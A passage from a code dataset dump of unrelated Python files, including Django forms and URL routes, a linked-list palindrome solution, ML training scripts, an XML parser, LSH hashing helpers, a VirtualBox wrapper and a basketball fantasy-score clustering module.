plt.show()\n return final_epoch_train_acc, final_epoch_validation_acc\n","sub_path":"common/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":8447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"395152134","text":"import re\nfrom django import forms\nfrom django.core.exceptions import ValidationError\nfrom bootstrap3_crispy.bootstrap import StrictButton, FormActions\nfrom bootstrap3_crispy import layout as crispy\nfrom bootstrap3_crispy.helper import FormHelper\nfrom casexml.apps.case.xml import V1, V2\n\n\nclass EmailForm(forms.Form):\n email_subject = forms.CharField(max_length=100)\n email_body = forms.CharField()\n real_email = forms.BooleanField(required=False)\n\nclass BrokenBuildsForm(forms.Form):\n builds = forms.CharField(\n widget=forms.Textarea(attrs={'rows': '30', 'cols': '50'})\n )\n\n def clean_builds(self):\n self.build_ids = re.findall(r'[\\w-]+', self.cleaned_data['builds'])\n if not self.build_ids:\n raise ValidationError(\"You must provide a \")\n return self.cleaned_data['builds']\n\n\nclass PrimeRestoreCacheForm(forms.Form):\n check_cache_only = forms.BooleanField(\n label='Check cache only',\n help_text=\"Just check the cache, don't actually generate the restore response.\",\n required=False\n )\n domain = forms.CharField(\n label='Domain',\n required=True\n )\n version = forms.ChoiceField(\n label='Output version',\n choices=((V1, V1), (V2, V2)),\n initial=V2\n )\n cache_timeout = forms.IntegerField(\n label='Cache timeout (hours)',\n min_value=1,\n max_value=48,\n initial=24\n )\n overwrite_cache = forms.BooleanField(\n label='Overwrite existing cache',\n help_text=('This will ignore any existing cache and '\n 're-calculate the restore response for each user'),\n required=False\n )\n all_users = forms.BooleanField(\n label='Include all users in the domain',\n required=False\n )\n users = forms.CharField(\n label='User list',\n help_text=('One username or user_id per line '\n '(username must be full username e.g. 
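# --- Illustrative sketch (not part of the original file) ---
# clean_builds() above pulls build ids out of free-form textarea input with
# re.findall(r'[\w-]+', ...). On its own, that pattern splits on anything that
# is not a word character or hyphen:
import re

raw = "build-123, build_456\n  build-789"
print(re.findall(r'[\w-]+', raw))  # ['build-123', 'build_456', 'build-789']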
test@domain.commcarehq.org)'),\n widget=forms.Textarea(attrs={'rows': '5', 'cols': '50'}),\n required=False\n )\n\n def __init__(self, *args, **kwargs):\n super(PrimeRestoreCacheForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-lg-2'\n self.helper.field_class = 'col-lg-4'\n self.helper.form_method = 'post'\n self.helper.form_action = '.'\n self.helper.layout = crispy.Layout(\n crispy.Field('check_cache_only', data_ng_model='check_cache_only'),\n crispy.Div(\n 'version',\n 'cache_timeout',\n 'overwrite_cache',\n data_ng_hide='check_cache_only'\n ),\n crispy.Field('all_users', data_ng_model='all_users'),\n 'domain',\n crispy.Div('users', data_ng_hide='all_users'),\n FormActions(\n StrictButton(\n \"Submit\",\n css_class=\"btn-primary\",\n type=\"submit\",\n ),\n ),\n )\n\n def clean_users(self):\n user_ids = self.cleaned_data['users'].splitlines()\n self.user_ids = filter(None, user_ids)\n return self.cleaned_data['users']\n\n def clean(self):\n cleaned_data = super(PrimeRestoreCacheForm, self).clean()\n if not self.user_ids and not cleaned_data['all_users']:\n raise forms.ValidationError(\"Please supply user IDs or select the 'All Users' option\")\n\n if cleaned_data['all_users'] and not cleaned_data['domain']:\n raise forms.ValidationError(\"Please supply a domain to select users from.\")\n return cleaned_data\n","sub_path":"corehq/apps/hqadmin/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"259044573","text":"'''\n234. Palindrome Linked List\nGiven a singly linked list, determine if it is a palindrome.\n\nFollow up:\nCould you do it in O(n) time and O(1) space?\n'''\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n slow = fast = head\n \n while fast and fast.next is not None: \n fast = fast.next.next\n slow = slow.next\n \n node = None \n \n # reverse second half\n while slow: \n nxt = slow.next\n slow.next = node \n node = slow\n slow = nxt\n \n # compare first half to second\n while node: \n if node.val != head.val : \n return False \n node = node.next\n head = head.next \n return True","sub_path":"234_palindrome_linked_list.py","file_name":"234_palindrome_linked_list.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142070892","text":"import argparse\nfrom unityagents import UnityEnvironment\nimport numpy as np\nfrom src.dqn import DQN\nimport matplotlib.pyplot as plt\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--train\", help=\"Whether to train or load weights from file\",\n action='store_const', const=True, default=False)\n parsed_args = parser.parse_args()\n train = parsed_args.train\n\n env = UnityEnvironment(file_name=\"Banana.app\")\n dqn = DQN(env, solve_threshold=15.0)\n\n weights_filename = \"final_weights.pth\"\n\n if train:\n scores = dqn.train()\n dqn.store_weights(weights_filename)\n plot_scores(scores)\n else:\n dqn.run_with_stored_weights(weights_filename)\n\n\ndef plot_scores(scores):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plt.plot(np.arange(len(scores)), scores)\n plt.ylabel('Score')\n plt.xlabel('Episode #')\n plt.show()\n\n\nif __name__ == \"__main__\":\n 
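# --- Illustrative sketch (not part of the original file) ---
# The --train flag above is declared with action='store_const', const=True,
# default=False; argparse's action='store_true' is shorthand for exactly that:
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("--train", help="Whether to train or load weights from file",
                    action='store_true')
print(parser.parse_args([]).train)           # False
print(parser.parse_args(["--train"]).train)  # True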
main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"595969357","text":"from L2.functions import *\nimport random\n\ndef main():\n am_labels = 10\n X_tr, Y_tr, y_tr = readfile(\"../Datasets/data_batch_1\")\n X_tr1, Y_tr1, y_tr1 = readfile(\"../Datasets/data_batch_2\")\n X_tr2, Y_tr2, y_tr2 = readfile(\"../Datasets/data_batch_3\")\n X_tr3, Y_tr3, y_tr3 = readfile(\"../Datasets/data_batch_4\")\n X_tr4, Y_tr4, y_tr4 = readfile(\"../Datasets/data_batch_5\")\n\n X_tr = np.concatenate((X_tr, X_tr1), axis=1)\n X_tr = np.concatenate((X_tr, X_tr2), axis=1)\n X_tr = np.concatenate((X_tr, X_tr3), axis=1)\n X_tr = np.concatenate((X_tr, X_tr4[:, :9000]), axis=1)\n\n Y_tr = np.concatenate((Y_tr, Y_tr1), axis=1)\n Y_tr = np.concatenate((Y_tr, Y_tr2), axis=1)\n Y_tr = np.concatenate((Y_tr, Y_tr3), axis=1)\n Y_tr = np.concatenate((Y_tr, Y_tr4[:, :9000]), axis=1)\n\n y_tr = np.concatenate((y_tr, y_tr1), axis=0)\n y_tr = np.concatenate((y_tr, y_tr2), axis=0)\n y_tr = np.concatenate((y_tr, y_tr3), axis=0)\n y_tr = np.concatenate((y_tr, y_tr4[:9000]), axis=0)\n\n X_val = X_tr4[:, 9000:10000]\n Y_val = Y_tr4[:, 9000:10000]\n y_val = y_tr4[9000:10000]\n\n #X_val, Y_val, y_val = readfile(\"../Datasets/data_batch_2\")\n\n X_test, Y_test, y_test = readfile(\"../Datasets/test_batch\")\n\n LOAD = True\n\n mean_x = np.mean(X_tr, axis=1)\n\n mean_x = np.reshape(mean_x, (-1, 1))\n\n X_tr -= mean_x\n X_val -= mean_x\n X_test -= mean_x\n\n am_nodes = [50] # number of nodes for the hidden layers\n\n dim_img = len(X_val)\n\n W, b = get_parameters(dim_img, am_labels, am_nodes, 1337)\n\n# P, H = evaluate_classifier(X_tr[:, 0:100], W, b)\n#\n# djdb, djdw = compute_gradients(X_tr[:, 0:100], Y_tr[:, 0:100], P, H, W, 0.001)\n#\n# if LOAD:\n# djdb2 = load_mats(\"djdb2\", \"mats\")\n# djdw2 = load_mats(\"djdw2\", \"mats\")\n# else:\n# djdb2, djdw2 = compute_grads_num_slow(X_tr[:, 0:100], Y_tr[:, 0:100], W, b, 0.001, 0.00001)\n# save_mats(djdb2, \"djdb2\", \"mats\")\n# save_mats(djdw2, \"djdw2\", \"mats\")\n#\n# for lay in range(len(am_nodes) + 1):\n# print(\"lay: \" + str(lay))\n# diff_b = djdb[lay] - djdb2[lay]\n# diff_w = djdw[lay] - djdw2[lay]\n#\n#\n# bsum = np.sum(np.abs(diff_b)) / b[lay].size\n# wsum = np.sum(np.abs(diff_w)) / W[lay].size\n#\n# print(\"bsum: \", bsum)\n# print(\"wsum: \", wsum)\n#\n#\n# acc_before_train = compute_accuracy(X_test, y_test, W, b)\n# print(\"Accuracy before training: \", acc_before_train)\n#\n# n_batch = 100\n# n_epochs = 20\n# rho = 0.9\n# dr = 0.95 # decay rate\n#\n# eta_lower = 0.0055\n# eta_upper = 0.008\n#\n# lamb_lower = 0.0045\n# lamb_upper = 0.006\n#\n# pairing_tries = 100\n#\n# results = np.zeros((pairing_tries, 3))\n#\n# for t in range(pairing_tries):\n#\n# eta = random.uniform(eta_lower, eta_upper)\n# lamb = random.uniform(lamb_lower, lamb_upper)\n#\n# Wstar, bstar = mini_batch_GD(X_tr, X_val, Y_tr, Y_val, n_batch, eta, n_epochs, W, b, lamb, rho, dr)\n#\n# acc = compute_accuracy(X_test, y_test, Wstar, bstar)\n#\n# print(\"pair: \" + str(t) + \" acc: \" + str(acc), \" eta: \" + str(eta) + \" lamb: \" + str(lamb))\n#\n# results[t, :] = [acc, eta, lamb]\n#\n# # Sort results based on descending accuracy\n# results = results[results[:, 0].argsort()[::-1]]\n#\n# np.savetxt(\"results.txt\", results, fmt=\"%1.5f\")\n#\n\n\n n_batch = 100\n n_epochs = 30\n rho = 0.9\n dr = 0.95 # decay rate\n #eta = 0.0056\n #lamb = 0.00541\n eta = 0.00614\n lamb = 
0.00590\n\n\n Wstar, bstar = mini_batch_GD(X_tr, X_val, Y_tr, Y_val, n_batch, eta, n_epochs, W, b, lamb, rho, dr)\n\n acc = compute_accuracy(X_test, y_test, Wstar, bstar)\n\n print(\"Accuracy after training: \", acc)\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"L2/l2_main.py","file_name":"l2_main.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"464360117","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom apps.test_security.views import (\n proxy_view, hide_request_body_view, log_exempt_view, throttling_exempt_view, extra_throttling_view\n)\n\nadmin.autodiscover()\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('proxy/', proxy_view),\n path('hide-request-body/', hide_request_body_view),\n path('log-exempt/', log_exempt_view),\n path('throttling-exempt/', throttling_exempt_view),\n path('extra-throttling/', extra_throttling_view),\n]\n","sub_path":"example/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"140432808","text":"from control import *\nfrom control.matlab import *\nimport matplotlib.pyplot as plt \nimport numpy as np\nfrom datetime import datetime\n\nzeta = 0.707\nw0 = 1\nts = 0.1\n\nt1 = datetime.now()\ng = tf(w0*w0, [1,2*zeta,w0*w0])\ngz = c2d(g,ts)\n\ncoeffs = tfdata(gz)\n\nco = {\n 'a1':coeffs[1][0][0][1],\n 'a2':coeffs[1][0][0][2],\n 'b1':coeffs[0][0][0][0],\n 'b2':coeffs[0][0][0][1],\n 'dt':gz.dt\n}\n\ntheta_k_2 = 0.8\ntheta_k_1 = 0.78\n\nu_k_2 = 0.9\nu_k_1 = 0.8\n\ntheta_k = co['a1'] * theta_k_1 + co['a2'] * theta_k_2 + co['b1'] * u_k_1 + co['b2'] * u_k_2\n\nprint(gz)\nprint(co)\nprint(theta_k)\n\nt2 = datetime.now()\nprint(t2-t1)\n\nt = np.arange(0, 16, 0.1)\ny,t1 = step(gz,t)\nplt.step(t,y)\nplt.grid()\nplt.xlabel('t') \nplt.ylabel('y')\nplt.show()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"592525898","text":"import xml.etree.ElementTree as ET\nimport os\n\n# 这里是因为 python 涉及 xsl 和 xml 的联合转换的 module:libxml2 已经找不到了\n# 因此选择用这个解析,但是也写好了 对应的 xsl 文件: web/static/scenic.xsl\n# xml file is web/static/scenic.xml\n\n# 遍历xml文件\n\ndicts = {}\ndicts['names'] = []\ndicts['address'] = []\n\ndef __traverseXml(element):\n if len(element) > 0:\n for child in element:\n if child.tag == 'name':\n dicts['names'].append(child.text)\n # print('name: ', child.text)\n elif child.tag == 'address':\n dicts['address'].append(child.text)\n # print(child.text)\n __traverseXml(child)\n\ndef __mergeDicts():\n newDict = {}\n if len(dicts['names']) == 0 or len(dicts['address']) == 0:\n return newDict\n\n if len(dicts['names']) > len(dicts['address']):\n dicts['names'] = dicts['names'][0:len(dicts['address'])]\n elif len(dicts['names']) < len(dicts['address']):\n dicts['address'] = dicts['address'][0:len(dicts['names'])]\n\n # print(len(dicts['names']), ' ', len(dicts['address']))\n\n newDict = dict(zip(dicts['names'], dicts['address']))\n # print(newDict)\n\n return newDict\n\n# return the dict\ndef getDict():\n xmlFilePath = \"/static/scenic.xml\"\n tree = ET.parse(xmlFilePath)\n\n # 获得根节点\n root = tree.getroot()\n\n # 遍历xml文件\n __traverseXml(root)\n newDict = __mergeDicts()\n return newDict\n\n# Delete the list when it's done\ndef clearDict():\n clearli(dicts['names'])\n 
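# --- Illustrative sketch (not part of the original file) ---
# The manual recursion in __traverseXml above can be replaced by ElementTree's
# built-in iter(), which walks the whole tree for a given tag. On a toy
# document with the same name/address shape:
import xml.etree.ElementTree as ET

root = ET.fromstring(
    "<scenics><spot><name>West Lake</name><address>Hangzhou</address></spot></scenics>")
names = [el.text for el in root.iter('name')]
addresses = [el.text for el in root.iter('address')]
print(dict(zip(names, addresses)))  # {'West Lake': 'Hangzhou'}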
clearli(dicts['address'])\n\ndef clearli(li):\n if len(li) != 0:\n del li[:]","sub_path":"web/xmlAnalysis.py","file_name":"xmlAnalysis.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"555828702","text":"from server import db\n\n\nclass Operation(object):\n \"\"\"\n 操作驱动模块\n \"\"\"\n\n @staticmethod\n def execute(name=\"user\", controler=None):\n \"\"\"装饰事件\n :params name : 可选参数,如果不想默认使用相同方法!可指定方法\n :params control : 可选参数, 传递项要的事件控制器\n \"\"\"\n def control(func):\n result = lambda x: getattr(OperationDefault if not controler else controler, name if controler else \"default\")(x())\n def __console(*args, **kwargs):\n # print(args, kwargs)\n return result(func)\n return __console\n return control\n\nclass OperationDefault(object):\n \"\"\"默认的操作模块\n\n \"\"\"\n @classmethod\n def default(cls, response):\n \n return response\n\n\n\n \n\n\ndef _parent_resoves():\n level_one = db.query(\"SELECT * FROM company_menu WHERE is_deleted=0 AND level=1\")\n level_two = db.query(\"SELECT * FROM company_menu WHERE is_deleted=0 AND level=2\")\n\n level_one_dict = {}\n for item in level_one:\n item[\"data\"] = []\n level_one_dict[item[\"id\"]] = item\n\n for item in level_two:\n if item[\"parent_id\"] in level_one_dict.keys():\n \n level_one_dict[item[\"parent_id\"]][\"data\"].append(item)\n\n return level_one_dict\n\n\ndef parse(regions):\n parent_2_children = {}\n data = []\n for item in regions:\n children = parent_2_children.get(item['parent_id'], [])\n children.append(item)\n parent_2_children[item['parent_id']] = children\n \n for root in parent_2_children[0]:\n data.append(build(root, parent_2_children))\n return data\n\ndef build(root, parent_2_children):\n\tnode = {}\n\tnode['id'] = root['id']\n\tnode['name'] = root['name']\n\tif root['id'] in parent_2_children:\n\t\tnode['list'] = []\n\t\tfor item in parent_2_children[root['id']]:\n\t\t\tnode['list'].append(build(item, parent_2_children))\n\treturn node\n","sub_path":"server/utils/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"249585663","text":"import random\n\ndef isPrime(num):\n if num == 1:\n return False\n for divider in range(2, num):\n if num % divider == 0:\n return False\n return True\n\ndef smallestPrime(num):\n while(1):\n num = num + 1\n if isPrime(num):\n return num\n\ndef generateHashs(n, m):\n \"\"\"\n generate a list of hash functions\n :n - number of hash functions we want to generate\n :m - number of attributes\n \"\"\"\n random.seed(12)\n ab = []\n for i in range(2*n):\n n1 = random.randint(1,m)\n if n1 not in ab:\n ab.append(n1)\n\n a_list = ab[:n]\n b_list = ab[n:]\n m_new = smallestPrime(m)\n \n # print('ab list length:', len(ab))\n # print('the prime number m_new:', m_new)\n\n def generateHash(i):\n a = a_list[i]\n b = b_list[i]\n def hashfunc(x):\n return (a * hash(x) + b) % m_new\n return hashfunc\n return [generateHash(i) for i in range(n)]\n\ndef generateHashForLSH(r):\n random.seed(8)\n l_ = []\n for i in range(r):\n a = random.randint(1, 10000)\n if a not in l_:\n l_.append(a)\n\n def h(l):\n # l - list of integers\n l_len = len(l)\n sum_ = 0\n for i in range(l_len):\n sum_ = sum_ + l_[i] * l[i]\n return sum_ % 50000\n return h\n\nclass Rename():\n \"\"\"\n every value should be distinct\n \"\"\"\n def __init__(self, values):\n \"\"\"\n values - a list of values\n \"\"\"\n self.values = 
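# --- Illustrative sketch (not part of the original file) ---
# generateHashs() above builds a family of hash functions of the form
# h(x) = (a*hash(x) + b) mod p, with p the smallest prime above m. (Note that
# the sampling loop above discards duplicate draws, so fewer than 2n
# coefficients can survive.) The construction itself, with fixed a and b:
def make_hash(a, b, p):
    return lambda x: (a * hash(x) + b) % p

h1, h2 = make_hash(3, 7, 101), make_hash(5, 11, 101)
print(h1("alice"), h2("alice"))  # two independent bucket assignments in [0, 101)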
list(values)\n self.values_length = len(values)\n \n def getNewValue(self, original_value):\n try:\n new_value = self.values.index(original_value)\n except ValueError:\n return None\n return new_value\n \n def getOriginalValue(self, new_value):\n try:\n original_value = self.values[new_value]\n except IndexError:\n return None\n return original_value","sub_path":"assignment/assignment3/python/final/task3support.py","file_name":"task3support.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"553027972","text":"import os\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport matplotlib\nimport my_app.processing as proc\nfrom tensorflow.keras import models\nimport matplotlib.pyplot as plt\nimport pickle\nimport pandas as pd\nimport shutil\n\n\nfrom math import ceil\nfrom skimage import io\nfrom skimage import filters, color\nfrom scipy import ndimage as ndi\nfrom PIL import Image\n\nmatplotlib.rcParams.update({'figure.max_open_warning': 0})\n\n\ndef predict_tf(tf_model, image):\n \"\"\"\n Given a trained model, will return an array of predicted digit classifications.\n Args:\n tf_model (keras.models): \n image (str)\n \"\"\"\n matname = 'data/predictions__img'\n print('processing ', image)\n binary_arr, label_arr, segments, orig = \\\n proc.label_segments(image, matname, photo=False, marker=False)\n# os.remove(image)\n predicted = []\n fig, axes = plt.subplots(len(segments), figsize=(6, 6*len(segments)))\n for seg, ax in list(zip(segments, axes.flatten())):\n found = label_arr == seg\n x, y = np.where(found)\n xmin, xmax, ymin, ymax = np.min(x), np.max(x), np.min(y), np.max(y)\n xlen, ylen = found[xmin:xmax, ymin:ymax].shape\n diff = np.abs(ylen-xlen)\n change = ceil(diff/2)\n if diff != 0:\n if ylen > xlen:\n xmin -= change\n xmax += change\n\n else:\n ymin -= change\n ymax += change\n\n xlen, ylen = xmax-xmin, ymax-ymin\n diff = np.abs(ylen-xlen)\n if xlen > ylen: \n ymax += diff\n elif ylen > xlen: \n xmax += diff\n digit = binary_arr[xmin:xmax, ymin:ymax]\n digit = np.pad(digit, int(len(digit)*.2), mode= 'constant', constant_values=(0,0)) \n if digit.shape[0]<10:\n ax.set_visible(False) \n pass\n else:\n ax.imshow(digit,cmap='gray')\n im = Image.fromarray(np.array(digit)*255.0).convert(\"RGB\")\n im.save('000.jpg')\n img = cv2.resize(cv2.imread('000.jpg',cv2.IMREAD_GRAYSCALE),(28,28),interpolation=cv2.INTER_CUBIC)\n os.remove('000.jpg')\n p = np.argmax(tf_model.predict(img.astype(float).flatten().reshape((1, 28, 28, 1))))\n ax.set_title(p)\n im.save(matname+'___predicted____'+str(p)+'.jpg')\n predicted.append([ymin,p])\n\n predicted.sort() \n predicted = [pr[1] for pr in predicted]\n plt.close('all')\n return predicted\n\n\n\nif __name__ == \"__main__\":\n # tf_model = keras.models.load_model('static/mnist_hasyv2_master_20epochs_batch64_201911081573209782.h5') #tf_model.h5\n # oldfilename = '/home/nina/Downloads/imagename.png'\n # filename = '/home/nina/autograder/my_app/imagename.png'\n # shutil.move(oldfilename,filename)\n # predictions = predict_tf(tf_model,filename)\n # print(predictions)\n pass\n","sub_path":"my_app/predict1.py","file_name":"predict1.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"544491537","text":"#coding=utf8\nclass Animal:\n def eat(self):\n print(\"eat\")\n def run(self):\n print(\"run\")\n\nclass Dog(Animal):\n def bark(self):\n print(\"wang\")\n def 
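# --- Illustrative sketch (not part of the original file) ---
# Dog.run() above demonstrates the two equivalent ways to reach a parent
# method: super().eat() resolves through the MRO, while Animal.eat(self) names
# the base class explicitly. For single inheritance both behave the same:
class Base:
    def greet(self):
        print("hello from Base")

class Child(Base):
    def greet_twice(self):
        super().greet()   # MRO lookup -- preferred, survives re-parenting
        Base.greet(self)  # explicit base call -- hard-codes the parent

Child().greet_twice()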
run(self):\n super().eat()\n Animal.eat(self)\n\n\n\n\n\nwangcai = Dog()\nwangcai.eat()\nwangcai.bark()\nwangcai.run()\n\nprint(\"你好\")\n\n\n\ntry:\n pass\n # num = int(input(\"input\"))\nexcept ZeroDivisionError:\n print(\"请输入正确的整数\")\nexcept Exception as res:\n print(\"未知错误 %s\"%res)","sub_path":"OOP/extends_demo.py","file_name":"extends_demo.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"184878754","text":"import UnifiedTestBed as UTB\n'''\nprint(\"Let's run some K-Armed Bandits \\n\")\nprint(\"First let's get some parameters \\n\")\nprint(\"The defaults are 100 iterations of 5000 pulls of a 10-Armed Bandit using UCB\\n\")\nk = input(\"How many arms? :\")\nl = input(\"\\nHow many times should it pull arms? :\")\nn = input(\"\\nHow many iterations? :\")\nprint(\"\\nWhich algorithm? (1 = UCB, 2 = LRI, 3 = LRP )\")\nAlgorithm = input(\":\")\ntest = UTB.TestBed(int(n), int(k), int(l), int(Algorithm))\n'''\n\ntest = UTB.TestBed(100, 10, 5000, 1)\ntest = UTB.TestBed(100, 10, 5000, 2)\ntest = UTB.TestBed(100, 10, 5000, 3)\nprint(\"\\nAll done, the test file and graphs should be in your folder\\n\")\n","sub_path":"Nik's WIP/UserInterface.py","file_name":"UserInterface.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"591328966","text":"def getDigits(N):\r\n ans = set()\r\n while N > 0:\r\n ans.add(N % 10)\r\n N //= 10\r\n return ans\r\n\r\n\r\ndef brute(N):\r\n if N == 0:\r\n return \"INSOMNIA\"\r\n x = N\r\n soFar = getDigits(x)\r\n while len(soFar) != 10:\r\n x += N\r\n soFar = soFar.union(getDigits(x))\r\n # print(str(soFar)+\" \"+str(x))\r\n return x\r\n\r\nT = int(input())\r\nfor i in range(T):\r\n inN = int(input())\r\n print(\"Case #{0}: {1}\".format(i+1, brute(inN)))\r\n","sub_path":"codes/CodeJamCrawler/16_0_1/PLUkraine/gcj1.py","file_name":"gcj1.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"226879814","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\vbox\\vm\\library.py\n# Compiled at: 2013-03-15 12:05:06\nimport re\nfrom . 
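# --- Illustrative sketch (not part of the original file) ---
# Two anchor cases for the counting logic in brute() above, checked with the
# same digit-accumulation idea (brute(0) instead returns "INSOMNIA", since the
# multiples of 0 never add digits):
digits = set()
x, N = 0, 1
while len(digits) < 10:
    x += N
    digits |= {int(c) for c in str(x)}
print(x)  # 10 -- 1..9 cover digits 1-9, and 10 contributes the final 0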
import base, vm\n\nclass VmLibrary(base.VirtualBoxEntityType):\n cls = vm.VM\n\n def _nameGen(self, basename, autoname):\n if basename:\n name = basename\n else:\n name = 'unnamed_machine'\n existing = [ vm.name for vm in self.list() ]\n if name not in existing:\n yield name\n if not autoname:\n raise Exception(('Virtual machine {!r} already exists.').format(name))\n idx = 1\n genName = lambda : ('{} ({})').format(name, idx)\n while genName() in existing:\n idx += 1\n\n while True:\n yield genName()\n idx += 1\n\n def create(self, autoname=True, ostype=None, **kwargs):\n super(VmLibrary, self).create()\n name = kwargs.pop('name', None)\n if ostype:\n found = self.vb.info.ostypes.find(ostype)\n if not found:\n raise Exception(('OS type {!r} not found').format(ostype))\n kwargs['ostype'] = found.id\n nameGen = self._nameGen(name, autoname)\n while True:\n kwargs['name'] = nameGen.next()\n try:\n out = self.vb.cli.manage.createvm(**kwargs)\n except cli.CmdError as err:\n if 'already exists' in err.output.lower():\n continue\n else:\n raise\n else:\n break\n\n out = self.cli.util.parseParams(out)\n return self.get(out['Settings file'])\n\n cloneMsgRe = re.compile('^Machine has been successfully cloned as \"(.*)\"\\\\s*$', re.I | re.M)\n\n def clone(self, source, autoname=True, **kwargs):\n if 'name' in kwargs:\n gen = self._nameGen(kwargs['name'], autoname)\n kwargs['name'] = gen.next()\n out = self.vb.cli.manage.clonevm(source, **kwargs)\n match = self.cloneMsgRe.search(out)\n assert match, repr(out)\n machineName = match.group(1)\n return self.get(machineName)\n\n def listRegisteredIds(self):\n return self.vb.cli.manage.list.vms().values()","sub_path":"pycfiles/vbox-0.2.5-py2.7/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"35346157","text":"# pylint: disable=C0301\r\n# pylint: disable=line-too-long\r\n\"\"\"\r\nttflmodels.py\r\n Script contenant les fonctions de clustering utilisées pour la prédiction.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport statsmodels.formula.api as sm\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.metrics import mean_absolute_error\r\nfrom constant import VERBOSE, NB_DAYS_AVG, SEASON_AVG\r\n# from tools import load_calendar\r\nfrom collections.abc import Callable\r\nimport pickle\r\n\r\n\r\ndef cluster_position_team(_df: pd.DataFrame, _fields_for_ttfl_estim, _kmeans: int = 4,\r\n _num: bool = False) -> pd.DataFrame:\r\n \"\"\"\r\n Cette fonction permet de calculer les clusters de Poste x Adversaire.\r\n\r\n Parameters\r\n ----------\r\n _df: pd.DataFrame\r\n Le DataFrame contenant les données des joueurs.\r\n _fields_for_ttfl_estim: [\"str\"]\r\n La liste des champs à utiliser pour estimer le score TTFL.\r\n _kmeans: int\r\n Le nombre de clusters.\r\n _num: bool\r\n Définition des clusters en numérique (True) ou catégoriel.\r\n\r\n Return\r\n ------\r\n clusters: pd.DataFrame\r\n Le DataFrame contenant le cluster associé à chaque Adversaire x Poste.\r\n columns=['Adversaire', 'Poste', 'Cluster']\r\n \"\"\"\r\n if VERBOSE:\r\n print(f\"Estimation de du score TTFL avec : {', '.join(_fields_for_ttfl_estim)}\")\r\n print(f\"Répartition des Adverdaires x Postes sur {_kmeans} clusters.\")\r\n # Copie du DF pour éviter de l'alterer\r\n clusters = _df.copy()\r\n # Estimation du score TTFL et évaluation des écarts\r\n clusters[\"Diff\"] = clusters[\"TTFL\"] - 
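# --- Illustrative sketch (not part of the original file) ---
# The clustering step above scores each Poste x Adversaire pair by the residual
# of an OLS fit (observed TTFL minus the model's prediction). The core of that
# pattern, on a toy frame with a made-up 'Minutes' regressor:
import pandas as pd
import statsmodels.formula.api as sm

df = pd.DataFrame({'TTFL': [10.0, 14.0, 22.0, 30.0], 'Minutes': [12, 18, 25, 34]})
fit = sm.ols(formula="TTFL~Minutes", data=df).fit()
df['Diff'] = df['TTFL'] - fit.predict(df)  # positive Diff = player beat the model
print(df['Diff'].round(2).tolist())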
